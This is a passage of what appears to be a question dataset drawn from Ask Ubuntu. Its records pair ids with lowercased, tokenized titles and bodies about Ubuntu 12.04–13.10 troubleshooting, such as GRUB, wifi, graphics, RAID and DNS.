on sda1 & ubuntu installed on 25gb ssd volume sda2 ( this is msata i think ) grub or efi that helps me load both os properly without breaking anything swap partition can be added if needed on sda1 ( 4gb ? ) ? i have backed up my drive and have a 16gb usb3.0 with ubuntu loaded . i hope i have mentioned everything i need and know.. all i need now is some guidance and what to do right so that this installation goes as planned : ) partition map
365526	unity poor performance after upgrading to 13.10	i upgraded recently from 13.04 to 13.10 . i have dell inspiron 4gb ram , intel core i3 . login takes a lot of time and all the graphics are very slow . alt + tab takes a lot of time ( seconds ) . after reading some threads , i also removed cinnamon desktop , but it did n't change anything . tried running in failsafex mode , but still the performance is poor . i had to ultimately fall back to gnome flashback ( no effects ) . gnome flashback works fine without any issues . can anyone please help me get back to unity , else i will have a very hard time running using gnome . update here is my /var/log/dmesg and /var/log/xorg.0.log
365534	compiz at 30 % of cpu on thinkpad t420	after upgrading to 13.10 , the compiz process has started taking 30 % or more of cpu resources . in addition unity is sluggish and steam games that worked fine under 13.04 have a very low frame rate and are unplayable . any suggestions on how to resolve this issue .
365535	system hang when using sshfs	this is just a quick note that i want to share with others . it is about the problem that i encountered with my office machine . it was hanging continuously when ssh mount was used . the main problem is , as i assumed , the termination of ssh session , which caused the sshfs not to respond . the solution for this issue is the serveraliveinterval 60 directive in /etc/ssh/ssh_config file . hope this someone help !
365540	grub error-can i format hdd and fix it	i deleted my ubuntu partitions from windows xp now when i start up it says grub error.. i do not have any important information on my pc ( all backed up to cloud ) can i just format the whole thing and install a new os [ chrome probably ] , without worrying about this grub error ? again- i have no issue with formatting my pc [ would be quite glad to do it ] up till now i was dual booting windows xp and ubuntu 13.04. now i would like to switch to chrome os please help . i need help asap
365543	screencloud problem ubuntu 13.10	i have recently installed ubuntu 13.10 and i noticed that screencloud is not anymore in the default repositories , so i went and downloaded the .deb file frome the official website , but when i try to install it , it says that the `` libqtsingleapplication '' ca n't be found ... .how do i install it ? ? ... .on 13.04 it was working fine . thanks in advance .
365544	gigabyte ga-78lmt-s2pt motherboard drivers for ubuntu ?	i purchased a gigabyte ga-78lmt-s2pt motherboard . it has an atheros gbe lan ethernet controller . but i am not able to install network card driver . can you suggest a driver for that ?
365545	how to install kde connect on ubuntu 12.04 ?	kde connect is a new app aims to connect android phone and ubuntu/kubuntu and having lots of features . the steps involved in installing this piece of software in ubuntu 12.04 is shown in this official link http : //larsemil.se/small-howto-on-kde-connect-and-ubuntu/ i am getting a lot of error which i am not able to rectify so please help me out i am dying to use this thing as samsung kies is only supported in windows even though android is a inux based product.sorry for my poor english
365547	no chromium printer dialog with page settings ( headers and footers )	how can i use/activate the chromium/chrome print preview dialog where you can choose to print headers and footers ? if i press `` ctrl + p '' , the system print dialog is shown . i do n't use a hardware printer with this computer , just printing to pdf . the url chrome : //print is not available . the print preview in chrome : //flags is not listed there ( as it was in earlier versions ) i want to save some webpages as pdf with headers and footers . perhaps it 's just version specific : ubuntu 12.04.3 lts ; chromium package : 28.0.1500.71-0ubuntu1.12.04.1
365548	what is the difference between `man` and `man ( # ) ` ?	just saw someone referencing man 7 regex on stackoverflow . i tried man regex and got very similar output - there appear to be slight differences . so what is this magical number 7 ? searching man 7 unix on google gives me more mysterious results like unix ( 7 ) ...
365553	wifi access point with wicd ?	how can i make a wifi access point with wicd ? i have a wired connection at laptop , and would like to deliver wifi to my android phone . so in wicd i press network - > create an ad hoc network , which as i understand makes a wifi network . i ca n't see it in my phone . when i 've been using network manager , it is called hotspot there , and i had to connect to it myself in order to deliver it . so i press connect to my own wifi . but wicd then turns off my wired connection . and i 'm stuck and authentication phase . i 'm on kubuntu , 13.10 has some bug in network manager , so i switched to wicd . this might be related : `` does wicd allows controlling two interfaces at the same time ? no '' ( source ) but i 'm not sure .
365554	entropy_avail is 0 , do the /dev/urandom output random bits ?	if the entropy_avail is 0 , can i get random from /dev/urandom ( or /dev/random ) ? cat /proc/sys/kernel/random/entropy_avail 0 in the above case , can reading /dev/random provide different output for two different reads ?
365556	how to get the directrory name in shell script	i have a script which sets some environment variable to paths : export var1=/home/xyz/dir_in_which_this_file_exists export var2= $ var1/abc/qwe ... can i use something to get the dir_in_which_this_file_exists so that if i run this script from anywhere ( any path ) in the machine , it would set the same values to var1 depend on in which directory the script exists ? please help
365557	not able to find juju charm mysql root password ?	i tried to follow the steps mentioned in mysql charm : $ juju ssh < unit > mysql -u root -p enter root password : /var/lib/juju/mysql.passwd but after installing mysql charm , /var/lib/juju/mysql.passwd file was not there . kindly help locating mysql root password .
365561	can not connect to wifi	since updating my os from ubuntu 13.04 to ubuntu 13.10 i can not connect to any available wifi signal . when i was using ubuntu 13.04 , and all the wifi functions were working great . however , from the moment i upgraded to the newer version of ubuntu , i have this wifi connectivity issue . i have searched on google and i have also followed a few blogs but it did n't work for me . somebody please help me
365563	how do i install burg in ubuntu 13.10 ?	is there any way to install burg boot loader in ubuntu 13.10 ?
365564	should the ~/tmp folder belong to me or root ?	i was trying to run yeoman under my user , when i got errors when it tried to access /home/adityamenon/tmp . i checked the permissions and it turns out ~/tmp/ belongs to root . so i changed the user and group to myself , but was this the right thing to do ? who should ~/tmp belong to ? also , when i 'm booting , i get an error message about /tmp/ not being mounted ... if that info helps .
365568	chemical engineering simulation software ?	i am looking for chemical engineering simulation software similar to aspentech hysys for modelling of heat exchangers , pipeline flow and other material and energy balances . i ca n't seem to find anything through the software centre that is near to this great software . can anyone help ?
365570	pthread link failure on ubuntu 13.10 64 bit with multilib support	i am re-compiling a c application that linked fine on ubuntu 13.04 . it is failing to link ( -lpthread -lrt ) with : undefined reference to `sem_post' undefined reference to `pthread_create' etc . looking in my shared library i see dependencies on symbols of the form : u sem_post u pthread_create u pthread_mutex_destroy @ @ glibc_2.2.5 u pthread_self @ @ glibc_2.2.5 all of the @ @ variety resolve fine . not sure what is going on here ?
365571	12.04 ( gdm ) choose language at login	when i used ubuntu 10.04 , i can choose session language at login , see now i upgraded to 12.04 ( i remove unity and use gdm instead ) , i ca n't choose the language anymore , see how to fix this , please .
365572	steelseries engine or siberia v2 illumination mode	i have steelseries siberia v2 frost blue and i would like to switch it 's illumination mode . is there any way to run steelseries engine under the ubuntu ( mine is 13.04 ) ? i tried to run it under the wine , but i failed , unfortunately . is there any way to switch illumination mode without steelseries engine ? thanks .
365574	installation of a package with parameters being prompted on cli	say , i need to install a package using `` dpkg -i '' option , which would prompt user for some values say username and password . i can easily get it , as user enters , from terminal and proceed with installation . but going by this plan i can not automate the installation i.e . say i want to write a script for installation of above said package which takes the parameters interactively . so i want an dpkg installation plan which is interactive ( prompting for username and password ) and still be able to be invoked from a script so that the installation process is automated . so how to go about this issue ? are there any alternatives ? thanks in advance for all the solutions - guru
365577	remove unity top bar from second screen	how can i remove the top bar from the second screen ? i want it to appear only on my main screen . the second monitor is connected by hdmi .
365578	linking a program with boost using clang-3.4 and libc++ ?	i 'm trying to compile a simple c++ test file using libc++ ( instead of libstdc++ ) and the boost program options library from the ubuntu main repo . the program is as follows : # include < boost/program_options.hpp > namespace po = boost : :program_options ; int main ( ) { po : :options_description test ( `` test '' ) ; return 0 ; } i am compiling this using : clang++ -stdlib=libc++ test.cpp -lboost_program_options i am using ubuntu 13.10 with the pre-build binaries from the main repo for : libc++ : 1.0~svn181765-1 clang-3.4_1 : 3.4~svn183914-1ubuntu1 boost-program-options1.53 : 1.53.0-6+exp3ubuntu8 at the moment this program fails to link , giving me : test.cpp : ( .text+0xa6 ) : undefined reference to `boost : :program_options : :options_description : :options_description ( std : :__1 : :basic_string , std : :__1 : :allocator > const & , unsigned int , unsigned int ) ' a few searches seem to imply that the solution is to rebuild the boost library from source against libc++ . my question : is there any way to do this by using the system-installed boost from the main repo ?
365580	can not shut down from kde workspace after upgrade to saucy	adding to my sequel of things broken after the upgrade : networkmanager broken after upgrade to kubuntu saucy user can not mount disks after upgrade to saucy when i select shutdown from the kde workspace , i only get back to the login screen . when i do sudo poweroff , i can halt the machine . i have the impression that something is fundamentally broken with permissons on my system . networking only works from a root shell , mounting as well and now shutdown . what is up with all that ?
365583	what is implied by these ups related messages ?	i am using ubuntu12.04 and have apc ups connected through usb . i have apcupsd ( 3.14.10 ) installed . recently i have started getting messages on terminal like these : broadcast message from root @ desktop ( somewhere ) at 17:17 ... communications restored with ups back-ups-es500 '' the log file has these additional messages : oct 25 17:17:34 desktop kernel : [ 1192.920049 ] hub 3-0:1.0 : port 1 disabled by hub ( emi ? ) , re-enabling ... oct 25 17:17:34 desktop kernel : [ 1192.920059 ] usb 3-1 : usb disconnect , device number 5 oct 25 17:17:34 desktop kernel : [ 1193.160025 ] usb 3-1 : new low-speed usb device number 6 using uhci_hcd oct 25 17:17:35 desktop mtp-probe : checking bus 3 , device 6 : `` /sys/devices/pci0000:00/0000:00:1d.1/usb3/3-1 '' oct 25 17:17:35 desktop mtp-probe : bus : 3 , device : 6 was not an mtp device oct 25 17:17:35 desktop kernel : [ 1193.969232 ] generic-usb 0003:051d:0002.0005 : hiddev0 , hidraw0 : usb hid v1.10 device [ american power conversion back-ups es 500 fw:850.m3.i usb fw : m3 ] on usb-0000:00:1d.1-1/input0 oct 25 17:17:41 desktop apcupsd [ 1133 ] : communications with ups restored . can anybody please explain what problem is indicated and what i should do about it ? other details : if i use the commands : `` sudo service apcupsd stop '' and then `` sudo apctest '' the result is : clearing previous self test result ... cleared initiating self test ... initiated waiting for test to complete ... error reading status 25.876 apcupsd : linux-usb.c:784 hidiocgreport for function selfteststatus failed . err=no such device surprisingly if i use the apctest command again , the result is : clearing previous self test result ... cleared initiating self test ... initiated waiting for test to complete ... completed result of last self test : passed now what do i do about the message appearing on the terminal ?
365585	ubuntu 12.04 lts not booting on windows 64bit	i installed 12.04 lts on windows 8 on 64bit laptop using the windows installer . during booting , i chose ubuntu but it could n't come up . it showed error messages . this happened on several times . how can i make it work ?
365588	raid 5 mdadm -- grow drops performance , no increase in disk size	i 've set up a raid 5 system at home for the first time . i 've added 3 disks into the pc , and parted them all in 1 partition of 8g , and 1 partition of the remaining 492g then i made 2 raid volumes with each partition mounted the 16g as swap , and the other one as the system disk . this worked like a charm , then i added a 4rd disk to the array did the same thing ( parting in 2 partitions , and added both to the previously defined raid5 arrays ) ( mdadm -- add /dev/sdd1 etc ... ) then i did the mdadm -- grow /dev/md0 -- raid-devices=4 command ( ref : http : //zackreed.me/articles/48-adding-an-extra-disk-to-an-mdadm-array ) both arrays got rebuild , but they 're not using the new size . and the performance of my system dropped terribly . i 've tried booting in recovery mode , and doing the resize2fs /dev/md1 command , but i keep getting `` read only disk '' stuff as issue . how can i fix this ? because normal boot will keep my main disk in `` busy '' status , and i 've not dared doing a forced unmount what can i do to get my performance back up ? if any more information is needed , do tell , and i 'll supply what i can . thx in advance .
365594	installing ubuntu 13.10 on my netbook	i used yumi to make a bootable usb stick and i used both 12.04 and 13.10 iso files . on booting my laptop , it displays the yumi image and asks for the kernel image of my choice . when i choose 12.04 or 13.10 , it says boot : and after this there is no progress . what should i do ?
365595	ca n't hibernate on lid close 13.10	i 've recently upgraded to 13.10 and i ca n't find the option to hibernate . my computer does n't play ball when i suspend it ( screen does n't reactivate upon lifting the lid ) so in 13.04 i always used hibernate when lid closes . that option has now disappeared . when i go to power options the option to hibernate is not listed under `` close lid '' actions . the only options are suspend and do nothing . i had this same problem with 13.04 but did the following to fix it : altered the file /etc/polkit-1/localauthority/50-local.d/com.ubuntu.enable-hibernate.pkla to say [ re-enable hibernate by default ] identity=unix-user : * action=org.freedesktop.upower.hibernate resultactive=yes i 've tried this again after the update and it does n't appear to be solving the problem .
365596	keyboard not working in hp mini	i used lubuntu . at first keyboard worked properly . but later some switches of keyboard did not work . then i changed to ubuntu . but the problem did not solved . some switches ( eg . all number except 6.5 do not work , p , o , i , u do not work , up , down , left , right do not work ) . now what will i do ? plz give me some solution . my laptop is hp mini 110 .
365597	how to deal with / .config/path location	how to deal with / .config/path location ? i am using a software that sometimes autosaves to a / .config location . files and folder there does not appear in nautilus search , but yes , it does show up in locate -i `` foldername '' so , if i want to change the folder to another destination , what should i do ? and to remove all ? rmdir and rm -r -f says it can not work because this location does not exist . please help . thanks .
365601	i got an error upgrading 13.04 to 13.10 now after dkms install completed	i had an issue when i upgraded from 13.04 to 13.10 during the upgrade it hung up at the dkms complete screen , i managed to recover the system with out loosing any of my program however when i try to install the driver for my internal wifi card i get this : clif @ clif-aspire-3680 : ~ $ sudo apt-get install firmware-b43-installer reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : gnome-desktop-data libboost-filesystem1.49.0 libboost-locale1.49.0 libboost-regex1.49.0 libboost-system1.49.0 libboost-thread1.49.0 libdvbpsi7 linux-image-extra-3.8.0-19-generic ttf-droid ttf-liberation ttf-umefont ttf-unfonts-core use 'apt-get autoremove ' to remove them . the following extra packages will be installed : b43-fwcutter the following new packages will be installed : b43-fwcutter firmware-b43-installer 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 27.8 kb of archives . after this operation , 143 kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //us.archive.ubuntu.com/ubuntu/ saucy/main b43-fwcutter i386 1:017-2 [ 23.9 kb ] get:2 http : //us.archive.ubuntu.com/ubuntu/ saucy/multiverse firmware-b43-installer all 1:017-2 [ 3,980 b ] fetched 27.8 kb in 0s ( 63.9 kb/s ) preconfiguring packages ... selecting previously unselected package b43-fwcutter . ( reading database ... 470885 files and directories currently installed . ) unpacking b43-fwcutter ( from ... /b43-fwcutter_1 % 3a017-2_i386.deb ) ... selecting previously unselected package firmware-b43-installer . unpacking firmware-b43-installer ( from ... /firmware-b43-installer_1 % 3a017-2_all.deb ) ... processing triggers for man-db ... setting up bcmwl-kernel-source ( 6.30.223.141+bdcom-0ubuntu1 ) ... removing old bcmwl-6.30.223.141+bdcom dkms files ... -- -- -- -- uninstall beginning -- -- -- -- module : bcmwl version : 6.30.223.141+bdcom kernel : 3.11.0-12-generic ( i686 ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - status : before uninstall , this module version was active on this kernel . wl.ko : - uninstallation - deleting from : /lib/modules/3.11.0-12-generic/updates/dkms/ - original module - no original module was found for this module on this kernel . - use the dkms install command to reinstall any previous module version . depmod ... ... ... ... dkms : uninstall completed . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 6.30.223.141+bdcom completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . loading new bcmwl-6.30.223.141+bdcom dkms files ... building only for 3.11.0-12-generic building for architecture i686 building initial module for 3.11.0-12-generic done . wl : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.11.0-12-generic/updates/dkms/ depmod ... ... . dkms : install completed . any idea on how to fix this issue ?
365603	impossible to ping when activating second network card	i 'm new to linux , trying to get a clonezilla server up . i 'm really bad at understanding how my network should be configured . eth1 is the card for internet access , behind a proxy ( 192.168.41.5:80 ) eth2 is the card for deploying , connected to a router . when eth2 is running , i ca n't seem to connect to the internet as it automatically try to use eth2 for everything ( firefox , ping , apt-get ) . why is that ? running ubuntu 13.4 eth1 link encap : ethernet hwaddr 00:04:76:14:52:9a inet addr:192.168.12.2 bcast:192.168.12.255 mask:255.255.255.0 inet6 addr : fe80 : :204:76ff : fe14:529a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1821 errors:0 dropped:137 overruns:1 frame:0 tx packets:319 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:214123 ( 214.1 kb ) tx bytes:54667 ( 54.6 kb ) interrupt:16 base address:0xa000 eth2 link encap : ethernet hwaddr 00:25:64 : e7:2b : e3 inet addr:192.168.200.1 bcast:192.168.200.255 mask:255.255.255.0 inet6 addr : fe80 : :225:64ff : fee7:2be3/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:6 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:1004 ( 1.0 kb ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1115 errors:0 dropped:0 overruns:0 frame:0 tx packets:1115 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:85036 ( 85.0 kb ) tx bytes:85036 ( 85.0 kb ) my etc/network/interfaces : auto lo iface lo inet loopback auto eth1 iface eth1 inet static address 192.168.12.2 netmask 255.255.255.0 gateway 192.168.12.213 auto eth2 iface eth2 inet static address 192.168.200.1 netmask 255.255.255.0 ps : i 'm connected in ssh ( what a great invention ) into 192.168.12.2 and it works ( even if i ca n't ping my proxy ) ps2 : sorry if it 's a stupid question , `` linux '' was just a fancy word for me not so long ago . have a good day : )
365607	disable cpu rendering	i have a problem with the 3d functions of unity after the upgrade to 13.10 . i 've got a thinkpad r60 with intel gma950 graphics . low 3d performance , i know . but unity worked well since 11.10 . my laptop is connected to my tv ( 1920x1080 ) and this also was n't a problem , but i think now ubuntu thinks i wa n't to use both sceens ( i only want to use the tv ) and activates the cpu rendering for the compiz effects . result : the performance is gone . but , if i disconnect the tv , start the laptop , log me in and connect the tv again , it works without cpu rendering . it works also when i enable auto-login ( but i really do n't want to enable that ) . so , the question is : how can i get unity to work as it was in 13.04 ? does anybody have this problem or even better : a solution ? greetings from germany , stephan
365608	hp 8440p - strange sound from speakers during shutdown or reboot ( since ubuntu 12.04 )	i 've very annoying problem with my speakers . during shutdown or reboot there is strange noise from them simmilar to shuting down guitar aplifier . i 've read that this is something due to capacitor discharge because of some settings . it 's appearing since ubuntu 12.04 . my current version is 13.10 is there any possibility to remove this annoying sound ?
365609	bad download of latest stable version	i paid $ 16 and tried to download the latest version last night and got only part of it ( the file ends in ... iso.part ) . can someone tell me how to finish getting it ? i paid with paypal .
365610	ubuntu-touch on a pc running ubuntu 13.10	i 'm trying to start an ubuntu-touch session on a touchscreen ultrabook ( lenovo yogapad ) . is it possible to switch the section between the standard desktop mode and the ubuntu-touch desktop ? ubuntu 13.10 has the ubuntu-touch packages but i was unable to make them work properly . is it possible ? if so , how ? if not , is there any plan to make it possible ? thank you !
365612	help installing vendor software in ubuntu	i 'm appropriately embarrassed to ask this . i have software that i bought 8 years ago and at one point ran on red hat linux . i have n't used linux since then and have forgotten pretty much everything . i have recently intalled ubuntu 12.04 ( 32 bit ) as an operating system and would like to use this software , but for the life of me i ca n't figure out how to install it . the software is on a cd . here 's what happens ( or does n't ) : i click on the cd from the desktop , then i click on the file named install , then i get a screen asking if i want to run install , i click yes and then nothing . can anyone help ?
365614	any game like tuxkartracing for ubuntu ?	i like this game tuxkartracing and want other games like this . please help me . i already use gbrainy , torcs , neverball , 0ad and metal blob solid
365615	how do i enable multiple cores in my virtual enviroment ?	i 've installed ubuntu in a virtual enviroment using oracle vm virtualbox manager and it works great . however i 'd like to enable multiple cores - as seen in the image below my windows machine has 2 cores : now when i run the lscpu in ubunto i get the following info revealing that only 1 core is being utilized : i 've tried changing the settings of the virtual box to enable multiple processors but it wo n't allow me to do so as shown in the image below : how do i enable multiple cores ( processors ) in my virtual enviroment ?
365619	install ubuntu 12.04 step 4	when i get to step 4 of installation process , i 'm not being given the option to 'install ubuntu alongside windows 7 ' ( which is the option i want ) . instead i 'm presented with the option of it being my only operating system or 'something else ' . if i select 'something else ' i 'm presented with a scary list of options . how do i get to being able to having ubuntu installed alongside windows 7 ? i have a new lenovo thinkpad t430 .
365621	no wireless internet after upgrading to 13.10	after upgrading from ubuntu 13.04 to 13.10 my wireless internet at home stopped working . the ui says that i am connected but when i try to open firefox no pages load . the internet does work if i plug in my laptop directly to the modem or if i use my computer in windows ( dual boot ) . it is then clearly an issue with ubuntu since the wireless internet works in a different operating system . the wireless internet also works in ubuntu when i am in ubuntu and logged into a different wireless network at university but not on my wireless network at home . thank you to anyone who can ( and takes the time to ) help , fred
365622	how do i switch the escape and caps lock key in 13.10 or using any linux machine ?	i noticed the feature is n't there anymore to switch caps lock and escape as it was in 13.04 . will this be back in the lts ? is there a `` universal '' way to do this on any linux machine ? or does that depend on keyboard format ?
365625	unable to adjust sound volume	after a reboot , im suddenly unable to adjust the volume . i have tried adjusting it trough the panel shortcut , the ubuntu `` sound '' , trough pulseaudio and trough the hardware keys . before when i had problems like this , i used to use the amixer . but this app does not seem to be awailable in the repos anymore : \ the laptop is a system76 gazelle professional any ideas ?
365629	how can i switch keyboard layout with super+space in ubuntu 12.04 and later ?	i 'd like to switch keyboard layout via super+space , since it seems like both non-used keybinding ( for me ) and something familiar to both windows ( starting from win8 ) and osx users . currently i use alt+shift which is really frustrating since i often press that by accident .
365630	zfs raidz pool appears empty after upgrade to 13.10	i upgraded my ubuntu workstation where i had my home directory linked to a zfs filesystem . after the upgrade , i can no longer log into the desktop , but i can log in via terminal . when i browse to the zpool mount , i get nothing in the directory listing ( it appears empty ) . when i do a status of the pool , it shows that everything is 100 % fine and dandy . i tried doing an export and import to see if it may help , but to no avail . the real kicker though , is that i can change into directories on the mounted raid and see files ( ie , cd /mnt/raidstorage/home/steve or cd /home/steve -- > /mnt/raidstorage/home/steve ) . any idea what i should be doing ? either the zfs is n't booting fast enough , or in the right order , or maybe modules were swapped out ?
365631	how to reinstall the default graphics drivers in terminal and without internet	i accidently remove the graphics driver ( i did something like apt-get remove -- purge fglrx* and other things , i do n't really remember ) and now my computer boot to a console login page . now without gui i can not connect to wireless internet and so can not install anything . can i revert to the initial graphics driver ( and configuration ) ? maybe with an installation cd ? i have ubuntu 13.10 . i tried sudo-apt-get install -- reinstall fglrx , it did install , but when i tried fglrxinfo , it gives error : unable to open display ( null )
365635	i would like to learn inkscape and sozi . where do i begin ?	i 've created a few very basic presentations in sozi , which is an addon for inkscape that enables very nice presentations . my main limitation is that i do n't really know inkscape . the things i 've done in it are so basic , i 've discovered it by messing around in the gui . but now i would like to really learn inkscape and sozi . what 's the best place to start ? are there any recommendable books ? online tutorials ? are there online communities for inkscape and sozi , such as irc channels ?
365644	`qdbus` can not be called in kubuntu saucy	i just booted a fresh kubuntu 13.10 iso in a virtual machine and tried to run qdbus and got an error that not a single qt installation was found : qdbus : could not find a qt installation of '' the qdbus package is installed . how can i get it to work without installing qdbus-qt5 like i did on my main machine , where it broke a little differently ?
365645	how do i migrate local user account to use activedirectory account ?	i have been using my local user account on kubuntu 12.04 machine for a while ( half a year ) . so i customized my desktop/shortcuts/aliases/guis ... to well suit my needs . now i need to join my computer with activedirectory in our company and migrate my old local user account to the new one . ( everything else in local network is windows and my user name for the old local user account is the same as is in the ad . ) i successfully used likewiseopen to join the domain and every domain user is able to login to my machine and new user account/home directory is created for him/her . but some `` important details '' does not fit my needs and our company policy in this process . i want to migrate my user account - i don not want another account / home folder . i just want one and only one account and home folder for every user of my machine . i want to be the only administrator of this machine , except guys from our it department - of course they also need full access to my machine . how do i achieve this ? here is what i know and what i did : when you join the domain using likewise , the default setting is that domain accounts/homes are created under /home/likewise-open/domain/user . i do not want them to be there . rather i want all : - domain accounts/homes to be in /home/domain/user - local accounts/homes to be in /home/user . i know this can be changed by : lwconfig homedirtemplate `` % h/ % d/ % u '' if i login to my machine using ad before changing homedirtemplate , home folder is created in /home/likewise-open/domain/user . than if i login after the change , i got an other home folder under /home/domain/user . what happens with all those files and settings in /home/likewise-open/ ... . ? why i have two home folders in different places ? i am still the same user so i would like to have only one home folder and it should be the one i was using before the change . is this possible to set up ? the same applies to the home folder of my old local account . it was in /home/user and after joining the domain i want it to be in /home/domain/user . i understand that these are actually two different users although they have the same user name ( uids are different ) . i am still preserving the old user local account ( which i want to remove ) because i am aware of losing access to my machine . of course i added my domain user to sudoers file ... what i did is i simply moved my home dir with all files and settings to new location under /home/domain/user . but there are some strange issues now and it is because local user used to use different password than domain user . for ex . when i am using muon sw center from domain user account it asks for password but it accepts password only for the old local user . but when i am using muon sw package manager , it asks for password an it accepts the right password of current ( domain ) user . installing from cli usingn sudo apt-get install works perfect . also clicking on home folder button in dolphin moves me to /home/user and not to /home/domain/user . thank you for any advices and ideas how to handle this situation !
365646	why the toolbar buttons are black again ?	i really like the 13.4 release , because of the toolbar button color , i prefer when it is not black . i do n't know why you did n't applied it on all the apps , including gedit ... so my question is , will it be possible again , one day , to customize the theme like previously with gnome 2 , at least let us choose the button theme , you can even limit the choice to black or light gray . thanks .
365650	correct way to set dns	i have a dns server running on my computer , and i want ubuntu to use it to resolve addresses . i 've setup mydomain.com as a custom domain i went into network settings , switched to manual in 'wired ' , entered my ip , gateway , mask . and then i entered my ip in the dns field . how do i cause this to take effect ? dig @ myiphere mydomain.com works , but dig mydomain.com does n't return any address . if i edit /etc/resolv.conf by hand and change the first line from 127.0.1.1 to myiphere , then everything starts to work . but this does n't seem to be the right way to do things as resolv.conf warns against manual changes by hand . so how do i properly and reliably change dns ?
365651	unable to upgrade to ubuntu 13.10	output of lsb_release -1a no lsb modules are available . distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring output of apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . output of apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . output of do-release-upgrade -c checking for a new ubuntu release new release '13.10 ' available . run 'do-release-upgrade ' to upgrade to it . i ran do-release-upgrade after some time , during the process of update , i get this , calculating the changes calculating the changes the software on this computer is up to date . there are no upgrades available for your system . the upgrade will now be canceled . do you want to start the upgrade ? i said no . see the apt log : $ cat /var/log/dist-upgrade/apt.log log time : 2013-10-25 20:00:40.883012 log time : 2013-10-25 20:02:48.708936 log time : 2013-10-25 20:04:37.080375 ignore old unsatisfied important dependency on python3-uno : i386 ignore old unsatisfied important dependency on cups-pk-helper : i386 ignore old unsatisfied important dependency on apparmor : i386 ignore old unsatisfied important dependency on qtchooser : i386 ignore old unsatisfied important dependency on account-plugin-aim : i386 ignore old unsatisfied important dependency on account-plugin-yahoo : i386 ignore old unsatisfied important dependency on libgtk2-perl : i386 ignore old unsatisfied important dependency on brasero : i386 ignore old unsatisfied important dependency on lintian : i386 ignore old unsatisfied important dependency on unity-gtk2-module : i386 ignore old unsatisfied important dependency on unity-gtk3-module : i386 ignore old unsatisfied important dependency on appmenu-qt5 : i386 ubuntuone-client : i386 recommends on ubuntu-sso-client-gui [ i386 ] < none > ( none ) ( > = 4.1 ) ca n't be satisfied ! ignore old unsatisfied important dependency on ethtool : i386 ignore old unsatisfied important dependency on telepathy-haze : i386 ignore old unsatisfied important dependency on xserver-xorg-input-wacom : i386 ignore old unsatisfied important dependency on gnome-applets : i386 ignore old unsatisfied important dependency on indicator-applet-complete : i386 ignore old unsatisfied important dependency on alacarte : i386 ignore old unsatisfied important dependency on libgtk2-perl : i386 ignore old unsatisfied important dependency on brasero : i386 ignore old unsatisfied important dependency on deja-dup-backend-gvfs : i386 ignore old unsatisfied important dependency on libatm1 : i386 ignore old unsatisfied important dependency on cups-browsed : i386 starting pkgproblemresolver with broken count : 0 starting 2 pkgproblemresolver with broken count : 0 done ignore old unsatisfied important dependency on apparmor : i386 also , the sources.list changes to : $ cat /etc/apt/sources.list # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # official ubuntu repos # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ubuntu main repos deb http : //us.archive.ubuntu.com/ubuntu/ saucy main restricted universe multiverse # # # # # # ubuntu update repos deb http : //us.archive.ubuntu.com/ubuntu/ saucy-security main restricted universe multiverse deb http : //us.archive.ubuntu.com/ubuntu/ saucy-updates main restricted universe multiverse deb http : //us.archive.ubuntu.com/ubuntu/ saucy-proposed main restricted universe multiverse deb http : //us.archive.ubuntu.com/ubuntu/ saucy-backports main restricted universe multiverse # # # # # # ubuntu partner repo deb http : //archive.canonical.com/ubuntu saucy partner deb-src http : //archive.canonical.com/ubuntu saucy partner # # # # # # ubuntu extras repo deb http : //extras.ubuntu.com/ubuntu saucy main deb-src http : //extras.ubuntu.com/ubuntu saucy main edit : output of ls /etc/apt/sources.list.d/ hudson.list hudson.list.save ubuntu-toolchain-r-test-raring.list.distupgrade hudson.list.distupgrade ubuntu-toolchain-r-test-raring.list ubuntu-toolchain-r-test-raring.list.save how to solve the problem and upgrade to ubuntu 13.10 ? note : add a comment , if some other detail needed for answering the question .
365652	how or where to install tools to be able to run them via contextmenu	my question is rather simple , where do i have to put a tool to use it via the context menu > open with option ? additionally is it possible to set a specific tool as default to open for instance a text file ? i know there 's a menu to choose from but then again , how to add more options to it ?
365654	ubuntu install no sound	just tried the latest version of ubuntu and when my computer started up there 's no sound . youtube clips play fine , but still no sound . it 's a bit of an older computer ( p4 with soundblaster audigy 2 ) . i 'm trying ubuntu from usb stick .
365659	novice developer	sir . i 'm a student of b.tech final year from the cse branch . i 'm using ubuntu since the last 3 years . it gave me a lot of knowledge . so now i want to repay ubuntu back by developing some apps for ubuntu , but i do n't know which language i should choose : java , c or c++ or something else . so please , guide me how to start . i have intermediate knowlegde of c , c++ , java & linux scripts . so in which language should i start ? i do n't have any live software development knowledge so explain me everything . thank you
